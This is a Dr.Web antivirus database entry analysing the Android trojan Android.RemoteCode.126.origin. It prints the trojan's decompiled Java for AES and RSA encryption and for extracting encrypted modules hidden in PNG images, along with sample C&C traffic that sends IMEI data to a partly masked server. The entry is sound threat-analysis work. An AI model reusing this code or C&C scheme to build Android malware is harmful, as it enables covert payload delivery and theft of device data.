FOR CUSTOMERS

Library
My library

+ Add to library

Contact us
24/7 Tech support | Rules regarding submitting

Send a message

Your tickets

Profile

Android.RemoteCode.126.origin

Added to the Dr.Web virus database: 2018-01-17

Virus description added:

SHA1:

  • 582decad305a2c86b09b7024def880929b8fe6ac

A Trojan module which loads to an Android device a malicious program Android.RemoteCode.127.origin. Its code is obfuscated (encrypted). In addition, Android.RemoteCode.126.origin uses string encryption and reflection to call system classes.

Android.RemoteCode.126.origin is launched using the DexClassLoader class. Once launched, it establishes connection with the command and control (C&C) server located at http://sm.**msdk.com and receives an address to download an image. Example:

http://cdn-sm.**msdk.com/resource/sm/file/png/1513738735687/1513738735687.png

This image contains an encrypted malicious module Android.RemoteCode.125.origin, which is a modification of the Trojan and performs similar functions.

screen Android.RemoteCode.127.origin #drweb

Once launched, it downloads another image from the C&C server. This image also contains an encrypted Trojan (Android.Click.221.origin).

screen Android.RemoteCode.126.origin #drweb

An example of the image obtaining process and decryption with Trojan modules

First, Android.RemoteCode.125.origin receives from the C&C server http://sm.**msdk.com a public key:

{
"msg":"success",
"code":0,
"data":"MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCNKSl51vNbKmJhoM75HoaPX3i/6vzL24V3deREFji7rigpxOGQaiHn+3
WzSp4MuumSgDYpblePKnQ9q6m6Jv567CXsAyjbFds7aPx3cDoWbYT++R5vO152+wCu0tvZVVCck0x5aPShXE4ztE7ioSlZBhnYdIFC
pfWqBcDm4pi+fwIDAQAB"
}

Then if forms JSON (Java Script Object Notation) that looks the following way:

{
"action":202,
"params":{
"channel":"yyyy_02",
"uuid":"********-****-3615-a2d8-9d84cd5e186e",
"imei":"********0006551",
"sdkInitTime":1517582648179,
"activeTime":80000,
"pushVersion":15
}
}

After this, the Trojan generates an arbitrary key in the following way:


public static String randomKey() {
StringBuilder v1 = new StringBuilder();
Random v2 = new Random();
int v0;
for(v0 = 0; v0 < 16; ++v0) {
v1.append(((char)(v2.nextInt(95) + 32)));
}
return v1.toString();
}

and it uses the key to encrypt JSON created earlier:


public static String EncryptString(String key, String data){
byte[] ret = null;
try{
SecretKeySpec skey = new SecretKeySpec(key.getBytes(), "AES");
Cipher cipher = Cipher.getInstance("AES/CBC/PKCS5Padding");
cipher.init(Cipher.ENCRYPT_MODE, skey, new IvParameterSpec(key.getBytes()));
ret = cipher.doFinal(data.getBytes());
}catch (Exception e){
e.printStackTrace();
}
return new String(Base64.encode(ret, Base64.NO_WRAP));
}

Then Android.RemoteCode.125.origin encrypts the generated key with a public key received from the server:


public static byte[] encryptKey(byte[] data){
String key =
"MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCNKSl51vNbKmJhoM75HoaPX3i/6vzL24V3deREFji7rig
pxOGQaiHn+3WzSp4MuumSgDYpblePKnQ9q6m6Jv567CXsAyjbFds7aPx3cDoWbYT++R5vO152+wCu0tvZ
VVCck0x5aPShXE4ztE7ioSlZBhnYdIFCpfWqBcDm4pi+fwIDAQAB";
byte[] keyb = Base64.decode(key, Base64.NO_WRAP);
try {
PublicKey pkey = KeyFactory.getInstance("RSA").generatePublic(new X509EncodedKeySpec(keyb));
Cipher c = Cipher.getInstance("RSA/ECB/PKCS1Padding");
c.init(1, ((Key)pkey));
data = c.doFinal(data);
} catch (Exception e) {
e.printStackTrace();
return null;
}
return data;
}

Then the Trojan sends to the C&C server a request which looks the following way:

POST HTTP/1.1 http://sm.**msdk.com/athene/do
session:
CihyTVwzXMdJzR6V1PMPjObfgJMY/7WCmbrJq7GT9ZdpiPBlJs+NN/8h2aLESeAOPlnakLP4uq1oOrNcuZSGsQIQYocraobbN8CyyrcS
xZjlWuLSAdosknkWYsLFg1OYV2ptt0UWAW8kh37Hg9C9NRReMWErw8oDQ16ANUUJESs=
count: 1
version: 15
Content-Type: text/html
Accept-Encoding: gzip
Accept: application/json
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.2; Philips_S307 Build/KOT49H)
Host: sm.**msdk.com
Connection: Keep-Alive
Content-Length: 256
A+9tbN20WCpU7auWhdjSuEVRjHJJsphrqpvdRblInJVmq9A0Or0+P7W2kch2DhWF1Tpvw0tl3wl+1yrYhJSq0gkExp/g9lAAwnBx4VB
6ZOrfVyPnC4j+tWkL9ExS1wgg607PEdhM4RHHyjci7qvB3R4Rlk6e2zdrSAhzAwUzHaWa7YVUVvl1ru+zWU1g7SwuLq7oQsEkV8hoZ
pQLN5oFJcv+kp60vksn1S1uflMVggEaOh6KjctLRhrSnXMrZ9wJ

where feature session is a generated key encrypted earlier.

As a response, Android.RemoteCode.125.origin receives an encrypted task to download images with a link to download a graphic file. Task is decrypted the same way as data infected with the Trojan were encrypted on the first server request (the generated key is applied):

{
"msg":"success",
"code":0,
"data":[
{
"classLoader":true,
"init_methods":"[\"setCacheType\",\"setDebug\", \"init\"]",
"methods":"[{\"name\":\"setCacheType\",\"class\" : [\"int\"],\"value\":[3]},{\"name\":\"setDebug\",\"class\" :
[\"boolean\"],\"value\":[false]},{\"name\":\"init\",\"class\" :
[\"android.content.Context\",\"java.lang.String\"],\"value\":[\"context\",\"channel\"]},{\"name\":\"recycle\",\"class\":[],\"value\
":[]}]",
"is_run":true,
"name":"GW56",
"png":{
"classLoader":false,
"interval_second":0,
"start":4403,
"description":"",
"title":"",
"version":56,
"domain":"",
"download_url":" ", http://cdn-sm.**msdk.com/resource/sm/file/png/1513659330069/1513659330069.png
"is_run":false,
"name":"GW-",
"link_url":"",
"aesKey":"MnbquLPgogfYf2TD",
"desc":"",
"md5":"a4e722d859b2a4b94c763b117f962f8b"
},
"cache_type":3,
"destory_methods":"[\"recycle\"]",
"type":4,
"class_name":" .GW" com.xd.gw
}
]
}

In the response received from the server, there is a link to download an image with the Trojan module Android.Click.221.origin http://cdn-sm.**msdk.com/resource/sm/file/png/1513659330069/1513659330069.png and data for its decryption. This image looks the following way:

screen Android.RemoteCode.126.origin #drweb

Extraction of the Trojan module from the image could be performed the following way:


public static void decodePNG(String imgPath, int start, String key){
try(
FileInputStream fis = new FileInputStream(imgPath);
FileOutputStream fos = new FileOutputStream((imgPath + ".jar"));
ByteArrayOutputStream baos = new ByteArrayOutputStream()
) {
fis.skip(start);
int i = 0;
while ((i = fis.read()) != -1){
baos.write(i);
}
byte[] data = baos.toByteArray();
SecretKeySpec skey = new SecretKeySpec(key.getBytes(), "AES");
Cipher cipher = Cipher.getInstance("AES/CBC/PKCS5Padding");
cipher.init(Cipher.DECRYPT_MODE, skey, new IvParameterSpec(key.getBytes()));
data = cipher.doFinal(data);
fos.write(data);
}catch (Exception e){
e.printStackTrace();
}
}

Values start and aesKey are used for that. These values were obtained earlier from the response message of the C&C server.

News about the Trojan

Curing recommendations


Android

  1. If the mobile device is operating normally, download and install Dr.Web for Android Light. Run a full system scan and follow recommendations to neutralize the detected threats.
  2. If the mobile device has been locked by Android.Locker ransomware (the message on the screen tells you that you have broken some law or demands a set ransom amount; or you will see some other announcement that prevents you from using the handheld normally), do the following:
    • Load your smartphone or tablet in the safe mode (depending on the operating system version and specifications of the particular mobile device involved, this procedure can be performed in various ways; seek clarification from the user guide that was shipped with the device, or contact its manufacturer);
    • Once you have activated safe mode, install the Dr.Web для Android Light onto the infected handheld and run a full scan of the system; follow the steps recommended for neutralizing the threats that have been detected;
    • Switch off your device and turn it on as normal.

Find out more about Dr.Web for Android

© Doctor Web
2003 — 2022

Doctor Web is a cybersecurity company focused on threat detection, prevention and response technologies